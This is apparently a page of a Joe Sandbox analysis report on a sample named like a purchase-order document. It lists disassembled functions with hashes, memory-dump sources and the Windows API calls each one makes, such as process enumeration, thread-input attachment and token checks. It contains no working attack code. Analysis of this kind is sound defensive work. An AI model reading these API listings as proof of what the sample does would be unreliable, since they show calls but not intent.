Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: ad8e3b1d70c8430a9b236663aa9b8335aefa9cd8de7a28242f2882166640ae8f
Instruction ID: 1eeaf14b54c4e8e9a833c041d864844497d18a1ee3500814a5edf8f1795d6ff1
Opcode Fuzzy Hash: ad8e3b1d70c8430a9b236663aa9b8335aefa9cd8de7a28242f2882166640ae8f
Instruction Fuzzy Hash: C641BF38A09255DFCB01CF58D898EA977F4FF58310F1585AAE5249B3A1E730E941CF90

Function 001D16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 001D16EB

Part of subcall function 001A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001A3A57
Part of subcall function 001A3A3D: GetCurrentThreadId.KERNEL32 ref: 001A3A5E
Part of subcall function 001A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001A25B3), ref: 001A3A65

GetCaretPos.USER32(?), ref: 001D16FF
ClientToScreen.USER32(00000000,?), ref: 001D174C
GetForegroundWindow.USER32 ref: 001D1752

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 6d4eaf41881ff02ebf0fe100d8779ed266834753e0243123e70b345b834c5b72
Instruction ID: b149354743e585cfd81a010cac04de2787e8d840bf2c9b14dee90c1b9fcc1647
Opcode Fuzzy Hash: 6d4eaf41881ff02ebf0fe100d8779ed266834753e0243123e70b345b834c5b72
Instruction Fuzzy Hash: 93317075D01249AFC700EFA9C881CEEBBF9EF59304B5080AAE415E7211D731DE45CBA0

Function 001AD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 001AD501
Process32FirstW.KERNEL32(00000000,?), ref: 001AD50F
Process32NextW.KERNEL32(00000000,?), ref: 001AD52F
CloseHandle.KERNEL32(00000000), ref: 001AD5DC

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a7899d3657aec942e8175e4602153b6165cf35be4c3b65bb8920fcc833bd6763
Instruction ID: 38396b62cad367146a7ec13e9bd23a5c2b3ec33c5ff696117d39a27fb28a640e
Opcode Fuzzy Hash: a7899d3657aec942e8175e4602153b6165cf35be4c3b65bb8920fcc833bd6763
Instruction Fuzzy Hash: CB31A4721083019FD301EF54D885AAFBBF8EFA9354F14092DF586861A2EB719949CB92

Function 001D8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2

GetCursorPos.USER32(?), ref: 001D9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00197711,?,?,?,?,?), ref: 001D9016
GetCursorPos.USER32(?), ref: 001D905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00197711,?,?,?), ref: 001D9094

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: c86bf970ccb812d098fa61fa7da794076ab099082cc9bf39025d528e09bc1f53
Instruction ID: ab969b958e063aed55e7c193c532e46b66267f7c0dc74ea114f5069e8e1d17d8
Opcode Fuzzy Hash: c86bf970ccb812d098fa61fa7da794076ab099082cc9bf39025d528e09bc1f53
Instruction Fuzzy Hash: FF21D131601018EFDB259F94EC58EFA3BB9EF49350F048156F9058B261C73599A0DBA0

Function 001AD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,001DCB68), ref: 001AD2FB
GetLastError.KERNEL32 ref: 001AD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 001AD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001DCB68), ref: 001AD376

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: a21036e8e5ffa5d1d2c2858a2b593536433f171c3284328963c794731703895d
Instruction ID: f4f5899e157f8388eedcfe4df49a5bd2898db71773b270453b86327aff61ea3d
Opcode Fuzzy Hash: a21036e8e5ffa5d1d2c2858a2b593536433f171c3284328963c794731703895d
Instruction Fuzzy Hash: 352183B45056029F8B10DF28D88146EB7E4FF57364F104A1EF4AAC76A1D731D945CB93

Function 001A1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001A102A
Part of subcall function 001A1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001A1036
Part of subcall function 001A1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001A1045
Part of subcall function 001A1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001A104C
Part of subcall function 001A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001A1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001A15BE
_memcmp.LIBVCRUNTIME ref: 001A15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A1617
HeapFree.KERNEL32(00000000), ref: 001A161E

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: e73d0edc1abb02aff5b3685989606b3e4486fb2f3b6ff4f868146043d3f52666
Instruction ID: 751d3f6e0f2b61ea8d284d40f47befb184b96ff40c752c06be381aa18f7933f6
Opcode Fuzzy Hash: e73d0edc1abb02aff5b3685989606b3e4486fb2f3b6ff4f868146043d3f52666
Instruction Fuzzy Hash: B0219A75E41209FFDF00DFA4C945BEEB7B8EF46354F088859E445AB241E770AA45CBA0

Function 001D2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 001D280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 001D2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 001D2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001D2840

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 949ea264268bd0d391463c80106561ec5dee5f0a6627672b52cd146a084868b7
Instruction ID: d3425d8cffbc1f823f49516f34f0a7029d180c42adf815a2eb072248c6c1f39d
Opcode Fuzzy Hash: 949ea264268bd0d391463c80106561ec5dee5f0a6627672b52cd146a084868b7
Instruction Fuzzy Hash: 2421D331309111AFD7149B24D884FAA7B95EF65324F14825AF42A8B7E2C771FC82C7D0

Function 001A78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 001A8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,001A790A,?,000000FF,?,001A8754,00000000,?,0000001C,?,?), ref: 001A8D8C
Part of subcall function 001A8D7D: lstrcpyW.KERNEL32(00000000,?,?,001A790A,?,000000FF,?,001A8754,00000000,?,0000001C,?,?,00000000), ref: 001A8DB2
Part of subcall function 001A8D7D: lstrcmpiW.KERNEL32(00000000,?,001A790A,?,000000FF,?,001A8754,00000000,?,0000001C,?,?), ref: 001A8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001A8754,00000000,?,0000001C,?,?,00000000), ref: 001A7923
lstrcpyW.KERNEL32(00000000,?,?,001A8754,00000000,?,0000001C,?,?,00000000), ref: 001A7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,001A8754,00000000,?,0000001C,?,?,00000000), ref: 001A7984

Strings

cdecl, xrefs: 001A797B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 468fa276076cc8c63f78921b634e16c74f288d0ada2ec23d2aee4a8495d32f9d
Instruction ID: b0f9679e31fbcca8ab186aa5f9bb4ed07c34725ed0639469fe5b70be65eaa835
Opcode Fuzzy Hash: 468fa276076cc8c63f78921b634e16c74f288d0ada2ec23d2aee4a8495d32f9d
Instruction Fuzzy Hash: 3111063E201342ABCB156F34CC45D7B77A9FF56364B00402BF802CB2A4EB319911C791

Function 001D7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 001D7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 001D7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001D7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001BB7AD,00000000), ref: 001D7D6B

Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 11900efe9db4b3def96f16945884c72bf2194001b8e3ddd5c61b39aae5923443
Instruction ID: 1cebeb028cb2d20f904ccd307a7dcc3b6f961b68e805fa6901221500ed3726de
Opcode Fuzzy Hash: 11900efe9db4b3def96f16945884c72bf2194001b8e3ddd5c61b39aae5923443
Instruction Fuzzy Hash: 0F11D231215A55AFCF108F68DC04AA63BA6AF45370B118726F936C73F0E7308960CB80

Function 001D5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 001D56BB
_wcslen.LIBCMT ref: 001D56CD
_wcslen.LIBCMT ref: 001D56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 001D5816

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 7a67e468f5b02eb0d94a754705ca2e393712d5410bccd5a856be6aedceef4dae
Instruction ID: 62e257a65f5c3aa068c61cd54e9b63701686403b82bc5f2afe58c233a2e42568
Opcode Fuzzy Hash: 7a67e468f5b02eb0d94a754705ca2e393712d5410bccd5a856be6aedceef4dae
Instruction Fuzzy Hash: 1B11D375A0161896DF209F65CC85AEE7BBCEF21764B10852BF915D6281EB70CA84CF60

Function 00171D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3ac2ae4b3b6b82b3c12aa5f92c335ca59c30ce3024449e8e6014d7d17ddbc3c
Instruction ID: ba98e09f2e28d49580b72e65bacdf8938a290fd3b300015f2a2be08796380ce2
Opcode Fuzzy Hash: e3ac2ae4b3b6b82b3c12aa5f92c335ca59c30ce3024449e8e6014d7d17ddbc3c
Instruction Fuzzy Hash: 7F01DFB220A6167EFA2126BCBCC5F67673CDF513B8F358326F528A21D2DB608C404560

Function 001A1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 001A1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001A1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001A1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001A1A8A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 101513a081d6ebab7764af8ea91754c1ce3ac3731eca1699b0581c54db4255cf
Instruction ID: 72a9af8f8fb1db717b0be27f620b0b4ae2b77884714e4b8448a25d522c4e2409
Opcode Fuzzy Hash: 101513a081d6ebab7764af8ea91754c1ce3ac3731eca1699b0581c54db4255cf
Instruction Fuzzy Hash: CE113C3AD01219FFEB10DBA4CD85FADBB79EB04750F200091E600B7290D7716E50DB94

Function 001AE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001AE1FD
MessageBoxW.USER32(?,?,?,?), ref: 001AE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001AE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001AE24D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: d91e48f40ee49e88dbabf040b5bd7ec8589e9ae2d831e784cf3e43479b0db210
Instruction ID: 077a847b03c5dbc1467d8c7bf20598f3feb7611fb6913fc166ad25d6db3f0e53
Opcode Fuzzy Hash: d91e48f40ee49e88dbabf040b5bd7ec8589e9ae2d831e784cf3e43479b0db210
Instruction Fuzzy Hash: 48110876905259BBC7019FA8AC09BDE7FACEB46310F008656F925D3294D7708900C7A0

Function 0016D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0016CFF9,00000000,00000004,00000000), ref: 0016D218
GetLastError.KERNEL32 ref: 0016D224
__dosmaperr.LIBCMT ref: 0016D22B
ResumeThread.KERNEL32(00000000), ref: 0016D249

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 34223a482e1388c2a064256b58349c974abcb1166992c9a4ccc6d1736af324d6
Instruction ID: 21cb7982f37cc88a7c2411b7896db8132233e347fafd999b75ea5992bd0df2ff
Opcode Fuzzy Hash: 34223a482e1388c2a064256b58349c974abcb1166992c9a4ccc6d1736af324d6
Instruction Fuzzy Hash: 4D01F536E06205BBCB115BA9EC09BAF7B69EF92330F11421DF925921D0CF71C961C6E0

Function 0014600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0014604C
GetStockObject.GDI32(00000011), ref: 00146060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0014606A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 2750fbe99486142f832b1a47af18c1e6f0f3e3a547ccec292ebd17dad5c640e8
Instruction ID: 7cad1087c4379e5f857ffa487a2a79b1fac1f05d4f21aa3206c8b460decf9cb2
Opcode Fuzzy Hash: 2750fbe99486142f832b1a47af18c1e6f0f3e3a547ccec292ebd17dad5c640e8
Instruction Fuzzy Hash: F3116172502509BFEF125F94DC44EEABB69EF19359F040216FA1452120D736DCA0DB91

Function 00163B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00163B56

Part of subcall function 00163AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00163AD2
Part of subcall function 00163AA3: ___AdjustPointer.LIBCMT ref: 00163AED

_UnwindNestedFrames.LIBCMT ref: 00163B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00163B7C
CallCatchBlock.LIBVCRUNTIME ref: 00163BA4

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: fd5582462925d18449fa0a7daaa8daf82291ba45aaa651b3f4888fe70ac4298f
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: EF010832100149BBDF126E95CC46EEB7F6EEFA9754F044018FE58A6121C732E971EBA0

Function 00173073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001413C6,00000000,00000000,?,0017301A,001413C6,00000000,00000000,00000000,?,0017328B,00000006,FlsSetValue), ref: 001730A5
GetLastError.KERNEL32(?,0017301A,001413C6,00000000,00000000,00000000,?,0017328B,00000006,FlsSetValue,001E2290,FlsSetValue,00000000,00000364,?,00172E46), ref: 001730B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0017301A,001413C6,00000000,00000000,00000000,?,0017328B,00000006,FlsSetValue,001E2290,FlsSetValue,00000000), ref: 001730BF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4b22338b428c2f52aa2fe402a82fb1afbddfd39a22fb8cb037f13b248c2ac7e0
Instruction ID: da732492a210482fc94ce615119fa091c00f402b77a3fa111e55bbd8d14fb1b4
Opcode Fuzzy Hash: 4b22338b428c2f52aa2fe402a82fb1afbddfd39a22fb8cb037f13b248c2ac7e0
Instruction Fuzzy Hash: 3B012032353333ABCB314B789C4895777A8AF05761B118720F92DD7140DB21D981D6E0

Function 001A7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 001A747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001A7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001A74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001A74CA

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

